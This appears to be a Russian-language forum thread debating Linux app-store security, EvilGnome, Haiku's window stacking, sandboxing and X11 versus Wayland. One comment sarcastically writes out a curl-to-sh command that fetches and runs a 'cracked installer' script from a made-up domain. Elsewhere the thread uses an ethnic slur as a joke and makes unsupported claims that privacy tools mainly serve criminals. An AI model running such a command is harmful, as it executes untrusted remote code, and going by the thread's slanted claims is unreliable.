О будущем линукса

Мейнтейнеры и так обеспечивают безопасность репов причем бесплатно.

Бардак сейчас в магазинах, поэтому борьба долдна идти за это. И я не вижу ни одного препятствия, которое бы мешало например дополнения гнома минимально проверять перед добавлением в общедоступный магазин.

При любой даже минимальной проверке EvilGnome сразу был бы откинут.

Тот случай с палемуном вообще требовал банальной сверки контрольных сумм. Это можно элементарно делать хоть скриптом по крону, и сотни нефти для этого не нужны.

Я не умею читать, я же кот!

А писать при этом умеете? Или просто ходите по клавиатуре, а ИИ выдаёт из этого осмысленный текст, как Наш Robotonic выдаёт нечто похожее на музыку из произвольных входных данных? До чего техника дошла!

Контекст как-то мимо прошёл

Отсылка к этому.

А писать при этом умеете?

Кластер из котят. Каждый отдельно мало что может, но вместе мы можем всё.

Отсылка к этому.

Мне бы такую память! ☺

Сильно умные в таком случае начнут эвристически распознавать имитации. И от этого пострадают легитимные пользователи, у которых просто реально какая-то нетипичная конфигурация. Типа как в пейсбуке банят за якобы ненастоящее имя.

Мейнтейнеры и так обеспечивают безопасность репов причем бесплатно.

В этом мире нет ничего бесплатного.

Ну вот так же и магазин оплатим.

На Опеннете встроенный поиск есть, зачем посылаете в какой-то пукел?

прикрепления окон друг к другу, что позволяет использовать принцип UNIX Way в GUI и собирать полноценные окружения

Оно там реально для чего-то полезного нужно? Ну, например, могу я приклеить к файловому менеджеру сбоку просмотрщик фотографий, чтобы при выборе файла в менеджере просмотрщик открывал нужное фото?
Я как-то тыкал Haiku в виртуалке и особой пользы от склеивания не заметил.

Оно там реально для чего-то полезного нужно?

Да, там даже есть IDE в которой это прикрепление окон лежит в основе:

https://exlmoto.ru/wp-content/Images/HAIKUP/HaikuPaladin.png

https://github.com/adamfowleruk/Paladin

Собственно само IDE представляет собой лишь панельку управления файлами сбоку, а терминал и редактор текста использует сторонние. Интересный подход.

Зачем это надо на десктопе личного компьютера?

А как ограничить приложение какое-либо? Представим, что завтра Haiku станет операционной системой #1, под неё будет множество программ. Доверять каждому калькулятору полный доступ ко всем файлам? И множество пользователей на домашнем компьютере тоже может быть очень кстати. Банально, создать учётные записи родителя и ребёнка, чтобы второй не смог удалить файлы первого, а так же половину системы. Даже упомянутый LVM на домашней машине это очень нужная вещь: купил пользователь второй SSD и легко и просто расширил раздел с ситемой на него.

Так-то я Haiku пробовал и она мне даже понравилась. Но такие заявления, мол на десктопе нужно не больше, чем Windows 3.11 это как-то странно...

Как раз из-за него Ъ-никсовый софт в подобные контейнеры не заворачивается в принципе.

Наоборот! Отлично заворачивается, если к этому добавить ещё пространства имён, монтирования и единый протокол, как в Plan 9. В общем-то в GNU/Linux многое в этом направлении уже сделано. Получается, что всего-то надо внутрь контейнера смонтировать нужные файлы. Те, к которым доступ не положен, либо не монтировать, либо использовать какие-то «заглушки», которые будут выдавать фейковые данные.

В FreeBSD они тоже взяты из Линукса, но они хотя бы приведены к минимально приличному виду.

Чем они в Linux неприличные, например?

ОСТАНОВИТЕ. ЭТО. НЕМЕДЛЕННО.

Да мы и рады бы, только как это сделать?

сам Android передрал спам диалогами с древних J2ME-мобилок вроде Nokia и Motorola

Ой ли?

Изначально там никакого спама нет, приложение или получает все требуемые права при установке, или отправляется в утиль. Для обхода этого требовались костыли под рутом. AOT-компиляцию тоже завезли далеко не сразу, когда в JP-7 она уже лет 7 как была.

Apple-подход с жёсткой модерацией и отстёгиванием бабла для принятия ПО в магазин

Вообще-то этот подход из линуксячьих репозиториев и пришёл. Где софт собирают сами, и сношают мозги разработчикам, прежде чем его в репозиторий вообще принять. Особенно в дебиане. Одна только и разница, что бабло отстёгивать не нужно. F-Droid по такой же схеме работает.

Причём с точки зрения бизнеса эти капиталовложения выгодны и оправданы, потому что за те огромные деньги, которые стоят яблочная учётка разработчика, плюс яблочное железо, получают человеческий саппорт, который чётко указывает на требования и косяки. А в Google Play модерируют роботы, которые по неизвестной причине заморозить приложение, в запущенных случаях всю учётку нафиг, и даже прочие гуглосервисы, и даже на других учётках, посчитанных «связанными» — прецеденты были, при этом до саппорта достучаться нереально, только через кумовство. Благо, рыночек уже потихоньку ставит их на место: у магазинов Amazon/Huawei тоже доля внушительная, плюс Aptoide/APKPure для халявщиков.

GNOME 3, который из коробки как в Debian, так и в Ubuntu, могли завируситить этим EvilGnome’ом, расширение болталось в официальном магазине расширений. Так о каком уровне безопасности ты говоришь?

А ещё можно из браузера, который есть в репозитории, с OpenJDK, который есть в репозитории, зайти на мокрописечный сайт и получить оттуда без спроса зловред, ага. Шок, галактика опасносте!

А ещё можно curl https://vasya-pupkin.tk/ph0t05h0p-1nst4ll3r-cr4ck3d.sh|sh запустить, для этого вообще штатного инструментария любого дистрибутива достаточно.

Отсутствие векторной графики на уровне GUI сервера.

Т.е. это надо вернуться к первоначальной концепции X11, где серверу отдаются команды «Нарисовать линию по координатам, вот таким цветом»? А что делать когда приложению надо что-то сильно нестандартное? Кстати, насколько я понимаю, X-сервер (возьмём распространённые реализации, за все сказать не могу) никогда сами команды у себя не кешировал, а просто сразу на экран рисовал, потом, при необходимости посылал приложению запрос на отрисовку всего ещё раз. Хотя мог бы хранить, что логично для эффективной работы по сети. Был/есть какой-то backing storage (или как-то так оно называется) но я не уверен, что это про то и не видел, чтобы особо где-то использовалось. В этом ключе ещё интересно, что там под капотом у NeXTSTEP и современной macOS с их DisplayPostScript и неким внутренним PDF.

Ну вообще здоровое общество так и работает. Простые граждане ассумят определённый уровень безопасности, за который они даже напрямую не платят (ибо на это непрямо расходуются налоги). И что преступники, даже если объявятся, будут наказаны. Ведь они живут не при анархии, и потому каждый дом не является бронированным бункером.

У сесуритифанатиков же, которые уже второе десятилетие во имя «безопасности» портят UI, почему-то идея-фикс, что пользовательские ЭВМ в принудительном порядке надо в такие вот бункеры превратить. Видимо, потому, что: 1) пытаются свои криптоанархические идеи проецировать на здоровых людей; 2) Интернет един для всего мира, для разных стран с разными юрисдикциями: в Интернете преступники могут спрятаться где-нибудь в Румынии/Украине/Нигерии/Сомали/etc., и их хрен кто достанет, да и без этого достать сложно, потому что проще запутывать следы, чем IRL. Но это на самом деле свидетельствует о том, что Интернет в текущем виде банально ущербен, и надо исправлять его, а не подпирать неудобными костылями. В ФИДО подобные проблемы очень легко решались ;) Китайцы тоже пилят альтернативный неанонимный стек протоколов на замену этому бардаку.

Мне бы такую память! ☺

Вы точно кот, или рыбка?

Мне бы такую память! ☺

Вы точно кот, или рыбка?

Мы — кластер из котят! // Тоже отсылка.

Вы, кстати, табличку как-то профилонили, не хотите дополнить? ;) https://wayland-bites.github.io

Эту и не припоминаем, вот кластер из рыбок в Finding Nemo помним. В школе ещё игра по нему стояла.

А десклет калькулятора по мере заполнения панели вниз уезжает, или остаётся под ней?

Доверять каждому калькулятору полный доступ ко всем файлам?

Если программа вредная и недоверенная, то ей место в браузере. Вы в 2007-м застряли?

создать учётные записи родителя и ребёнка

Haiku не для нищебродов, купите дитю отдельный компуктер.

https://youtube.com/watch?v=ciMnSE1NAQA

всего-то надо внутрь контейнера смонтировать нужные файлы

В этом и проблема.

Нельзя заранее знать, какие файлы нужны, а какие нужны, если это универсальный инструмент, а не открывашка картиночек из ~/Downloads.

Да хотя бы не потакать пропаганде сесуритифанатиков. Или Вы не верите в демократию? ;)

ЯННП

А что делать когда приложению надо что-то сильно нестандартное?

А как Вы думаете, в чём главная причина примитивизации современных интерфейсов? ;)

Это «нестандартное» отмирает само собой.

Так что идея здравая, только в новой ипостаси: вместо векторной графики — GLSL.

современной macOS с их DisplayPostScript и неким внутренним PDF

Хм, а разве из неё это наследие не выкинули ещё в начале 00-х? Ну или если не тогда, то при капитальных переделках в Yosemite и El Capitan. Cocoa ж не через PostScript рисует.

ФМ пытается прочитать директорию, и Java-машина на каждую поддиректорию спрашивает разрешение. Каждый раз, и это не отключается, только сертификатом программу подписывать. Что тут непонятного?

Судя по этой статье, в макоси его никогда и не было: сразу выкинули, чтобы не платить Adobe за лицензию.

Что тут непонятного?

Теперь понятно, и правильно, а в российских дистрибутивах нужно будет давать разрешения через гос. услуги.

Было в одном из (неподтверждённых) опросов. Автор "кластера из котят" носит аватарку с белым нигером тигером (или не он).

разрешения через гос. услуги

Они-то раз даются.

А в Украине и вовсе ради удобства пользователей™ сделали так, что можно на ничего не подозревающих людей кредиты брать.

У Юлии Тимошенко есть аккаунт на ЛОРе?!

Я был бы не против.

Оно хоть обновление дистрибутива без переустановки переживает без бубна?

Сижу на Ubuntu. Устанавливал 18.04, пережила все промежуточные версии до последней, ничего не сломалось.

Потому что Tizen уже есть, но Enlightenment в нём нет.

Как это? У них на сайте написано, что Tizen работает поверх EFL.

Угу, Мы протупили, в каком месте списка переключились с тулкитов на целые программы, и употребили его во втором комментарии в значении целой среды, подумав, что в первом подразумевалось так же ;D

Я вообще не понимаю, зачем людям навязывают «безопасность». Нужно человеку шифрование - пусть разберется с нужными утилитами, почитает про алгоритмы, выберет по вкусу да зашифрует. Нужен файерволл - man iptables, и так далее. А дефолты везде и всюду оставить «небезопасные», кому надо - разберутся, кому не надо - обойдутся) А демократия по-настоящему работает только в небольших коллективах, как только выходим за рамки «тут все друг друга знают», начинаются махинации.

зачем людям навязывают «безопасность»

Шифропанкам выгодно растворяться в массе, примерно как пиратам. Чем технология более массовая. тем меньше вероятность, что кого-то конкретного за неё нагнут, и что вообще нагибать будут.

https://innereq.org/%D0%A1%D0%BA%D0%B2%D0%BE%D0%B7%D0%BD%D0%BE%D0%B5_%D1%88%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5_%D0%B4%D0%BB%D1%8F_%D0%BF%D1%80%D0%B5%D0%BA%D1%80%D0%B0%D1%81%D0%BD%D0%BE%D0%B9_%D1%84%D0%B5%D0%B4%D0%B5%D1%80%D0%B0%D1%82%D0%B8%D0%B2%D0%BD%D0%BE%D0%B9_%D1%81%D0%B5%D1%82%D0%B8_%D0%B1%D1%83%D0%B4%D1%83%D1%89%D0%B5%D0%B3%D0%BE

Распространено мнение, что лучше всего использовать шифрование по умолчанию. Ещё лучше, если у пользователей не будет возможности отправлять незашифрованные сообщения вообще. Это обусловлено тем, что при повсеместном использовании шифрования вы обезличиваете не только конфиденциальную информацию, которую хотите скрыть от посторонних лиц, но и всю информацию в принципе, не давая злоумышленнику шанс на поиск наиболее уязвимой жертвы, используя публичные данные.

А в особенности лоббируют это, конечно, всякие жулики. Стоит только взглянуть на криптовалюты и TOR, которые фактически преимущественно используются для всяких тёмных дел, но даже ЛОР кишит промытыми фанатиками, которые усердно пытаются доказывать, что добропорядочным гражданам вся эта приватностная шушера тоже зачем-то нужна. В ЕС это вообще на уровне правительств лоббируется, вот уж куда мафия добралась!

кому надо - разберутся, кому не надо - обойдутся

Проблема в том, что многие люди слишком ленивые, чтобы переходить от нужды к делу, особенно в областях, где не являются экспертами. Так и страдают годами, либо вообще игнорируют проблему.

Поэтому подход «сначала спрос, потом появится предложение» на массовом рынке не работает. Нужно сначала создать предложение, а уж потом вскроется латентный спрос, если он вообще есть. И определить, есть ли спрос, пока он явно не проявляется — крайне сложная задача, потому внушительная доля бизнесов и прогорают.

С халявой всё точно так же, с той лишь разницей, что халява создаёт нездоровую конкуренцию платному, при этом фактически всё равно финансируется из каких-то непрямых источников: от мамки рачевода, пилящего свободную поделку вместо работы, более успешную, чем платные аналоги — до крупных корпораций, которые имеют достаточно ресурсов на огромные халявные проекты, вытесняющие демпингом что-либо платное, пусть даже и лучшее. В том числе и чтобы зохавать рынок и в будущем таки начать драть с него бабло, ага. И СПО тут не исключение, вспомнить хоть Kendo UI или Qt, у которых полноценную свободную версию со временем начали урезать. Независимые разработчики тоже внезапно вспоминают, что им надо кушать.

начинаются махинации

Как махинации мешают демократии? Вы о навязывании мнений? А существуют ли вообще ненавязанные мнения, с учётом того, что каждый человек изначально — чистый лист, состоящий из насранных ему в голову в разной пропорции другими людьми мнений?

вместо векторной графики — GLSL

Ха, а ведь GLX именно этим и является!

Ну и каким местом иксы устарели?

Может, теперь надо Vulkan через расширение протокола дёргать?

cast X512